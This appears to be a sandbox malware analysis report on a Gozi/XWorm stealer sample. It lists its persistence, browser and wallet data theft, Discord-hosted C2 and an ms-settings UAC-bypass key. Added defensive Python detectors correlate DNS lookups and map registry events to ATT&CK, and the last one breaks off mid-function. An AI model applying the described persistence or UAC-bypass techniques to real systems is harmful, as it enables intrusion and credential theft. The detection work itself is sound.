Malware Analysis Report

2025-01-22 18:56

Sample ID 240310-v72e9ahb94
Target Gk67Vl
SHA256 8ef0aa04db9fe87fe3e9d92103882dde1531a55f8c7fcbceda55f8ae4f501435
Tags
gozi xworm banker isfb persistence pyinstaller rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8ef0aa04db9fe87fe3e9d92103882dde1531a55f8c7fcbceda55f8ae4f501435

Threat Level: Known bad

The file Gk67Vl was found to be: Known bad.

Malicious Activity Summary

gozi xworm banker isfb persistence pyinstaller rat spyware stealer trojan

Xworm

Gozi

Detect Xworm Payload

Checks computer location settings

Executes dropped EXE

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates physical storage devices

Detects Pyinstaller

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Checks SCSI registry key(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-10 17:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-10 17:38

Reported

2024-03-10 17:43

Platform

win10v2004-20240226-en

Max time kernel

237s

Max time network

236s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A (2 events)

Gozi

banker trojan gozi

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe N/A (3 events)
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Win (3).exe N/A (3 events)
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pythonw.exe C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pythonw.exe C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A (2 events)

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe N/A (3 events)
N/A N/A C:\Users\Admin\AppData\Roaming\Win (3).exe N/A (3 events)
N/A N/A C:\Users\Admin\AppData\Roaming\CatrinePerm.exe N/A (3 events)
N/A N/A C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A (3 events)
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A (6 events)
N/A N/A C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe N/A (3 events)
N/A N/A C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe N/A (2 events)
N/A N/A C:\Users\Admin\AppData\Roaming\Update.exe N/A (2 events)

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\pythonw.exe N/A (64 events)

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update = "C:\\Users\\Admin\\AppData\\Roaming\\Update.exe" C:\Users\Admin\AppData\Local\Temp\WinRAR.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A (62 events)
N/A raw.githubusercontent.com N/A N/A (2 events)

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A (6 events)
N/A checkip.amazonaws.com N/A N/A
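
The two tables above (external IP lookup services and hosting services abused for C2) are more useful together than apart: a host that resolves api.ipify.org or ip-api.com and, seconds later, discord.com shows the pattern of a stealer collecting its victim's public IP and then reaching its Discord-hosted C2, while either domain on its own is ordinary workstation traffic. The following Python is an added example of that correlation over DNS logs; it is not part of the sandbox report. The log line format and the sample lines are constructed for the example; only the domain lists come from the report.

```python
"""Correlate DNS queries to external-IP lookup services with queries to
legitimate hosting services that the sandbox saw abused for C2.
Added example, not part of the sandbox report."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Domains taken from the report's "Looks up external IP address" and
# "Legitimate hosting services abused" tables.
IP_LOOKUP = {"ip-api.com", "api.ipify.org", "checkip.amazonaws.com"}
ABUSED_HOSTING = {"discord.com", "raw.githubusercontent.com"}

# Assumed log line format (not from the report): "<ISO-8601 time> <client-ip> <qname>".
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")


def parse_dns_log(lines):
    """Parse log lines into sorted (time, client, qname) tuples; malformed lines are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, client, qname = m.groups()
        events.append((datetime.fromisoformat(ts), client, qname.rstrip(".").lower()))
    events.sort()
    return events


def matches(qname, domains):
    """True when qname is one of `domains` or a subdomain of one."""
    return any(qname == d or qname.endswith("." + d) for d in domains)


def find_ip_lookup_with_c2(events, window=timedelta(minutes=5)):
    """Return {client: [(lookup_qname, hosting_qname, seconds_apart), ...]} for
    each client that queried an IP-lookup service and an abused hosting domain
    within `window` of each other (either order)."""
    by_client = defaultdict(list)
    for ts, client, qname in events:
        by_client[client].append((ts, qname))

    findings = defaultdict(list)
    for client, queries in by_client.items():
        lookups = [(t, q) for t, q in queries if matches(q, IP_LOOKUP)]
        hosting = [(t, q) for t, q in queries if matches(q, ABUSED_HOSTING)]
        for lt, lq in lookups:
            for ht, hq in hosting:
                gap = abs((ht - lt).total_seconds())
                if gap <= window.total_seconds():
                    findings[client].append((lq, hq, int(gap)))
    return dict(findings)


# Constructed sample log: one infected host, one Discord chat user, and one
# admin script that checks its public IP long before any Discord traffic.
SAMPLE_LOG = [
    "2024-03-10T17:39:02 10.0.0.15 api.ipify.org",
    "2024-03-10T17:39:03 10.0.0.15 discord.com",
    "2024-03-10T17:39:40 10.0.0.15 ip-api.com",
    "2024-03-10T17:41:10 10.0.0.15 raw.githubusercontent.com",
    "2024-03-10T17:39:05 10.0.0.22 discord.com",
    "2024-03-10T17:39:07 10.0.0.22 gateway.discord.gg",
    "2024-03-10T17:20:00 10.0.0.31 checkip.amazonaws.com",
    "2024-03-10T17:59:00 10.0.0.31 discord.com",
    "garbage line that should be skipped",
]

if __name__ == "__main__":
    for client, hits in find_ip_lookup_with_c2(parse_dns_log(SAMPLE_LOG)).items():
        for lookup, host, secs in hits:
            print(f"{client}: {lookup} and {host} {secs}s apart")
```

DNS logs carry no process name, so a hit here is a lead to pivot on (which process on that client opened the connection, and whether it is one of the dropped binaries listed above), not a verdict on its own.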

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A (4 events)

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).x = "4294967295" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1246" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\3\NodeSlot = "6" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\3\0\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\1\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\2 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259} C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616209" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open\command C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).y = "4294967295" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 020000000100000000000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open\command C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\Explorer.EXE N/A
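
Most rows in this table are Explorer writing its own ShellBag view state and carry no security meaning. The rows that matter are the ones where reg.exe creates ms-settings\shell\open\command under the user's _Classes hive (HKU\<SID>_Classes is HKCU\Software\Classes): that is the key a fodhelper.exe-style UAC bypass plants a command in, because the auto-elevating Settings binaries resolve the ms-settings handler from the per-user Classes hive first. The report records only the key creation, not the value written or whether an auto-elevating binary was launched afterwards, so treat it as a strong indicator rather than a proven elevation. Together with the Run key, Startup folder and schtasks.exe rows from the persistence sections above, these map onto a small set of ATT&CK techniques. The following Python is an added example, not the sandbox's own logic, that normalises the raw hive paths and applies those rules to events copied from the report's tables; the event dictionary layout and the rule names are assumptions made for the example.

```python
"""Map registry, file and process events of the kind tabulated in this report
onto persistence and UAC-bypass indicators.  Added example; not part of the
sandbox report and not any vendor's detection logic."""
import re

# HKU\<SID> is the user's HKCU; HKU\<SID>_Classes is HKCU\Software\Classes.
_SID = r"S-1-5-21(?:-\d+){4}"
_HIVES = [
    (re.compile(rf"^\\REGISTRY\\USER\\{_SID}_Classes\\", re.I), "HKCU\\Software\\Classes\\"),
    (re.compile(rf"^\\REGISTRY\\USER\\{_SID}\\", re.I), "HKCU\\"),
    (re.compile(r"^\\REGISTRY\\MACHINE\\", re.I), "HKLM\\"),
]


def normalize_registry_path(path):
    """Rewrite a raw \\REGISTRY\\... path into the HKCU/HKLM form the rules use."""
    for pattern, prefix in _HIVES:
        new, n = pattern.subn(lambda m: prefix, path, count=1)
        if n:
            return new
    return path


RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
MS_SETTINGS = re.compile(r"^HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command", re.I)

# (ATT&CK technique, rule name, predicate over a normalised event). Rule names are ours.
RULES = [
    ("T1547.001", "Run key persistence",
     lambda e: e["kind"] == "registry" and e["action"].startswith("Set value")
     and RUN_KEY.search(e["path"]) is not None),
    ("T1547.001", "Startup folder persistence",
     lambda e: e["kind"] == "file" and e["action"] == "File created"
     and STARTUP_DIR.search(e["path"]) is not None),
    ("T1548.002", "ms-settings handler hijack (fodhelper-style UAC bypass)",
     lambda e: e["kind"] == "registry" and MS_SETTINGS.search(e["path"]) is not None),
    ("T1053.005", "Scheduled task created via schtasks.exe",
     lambda e: e["kind"] == "process" and e["process"].lower().endswith("\\schtasks.exe")),
]


def detect(events):
    """Return one finding per (event, matching rule); ShellBag noise matches nothing."""
    findings = []
    for e in events:
        ev = dict(e)
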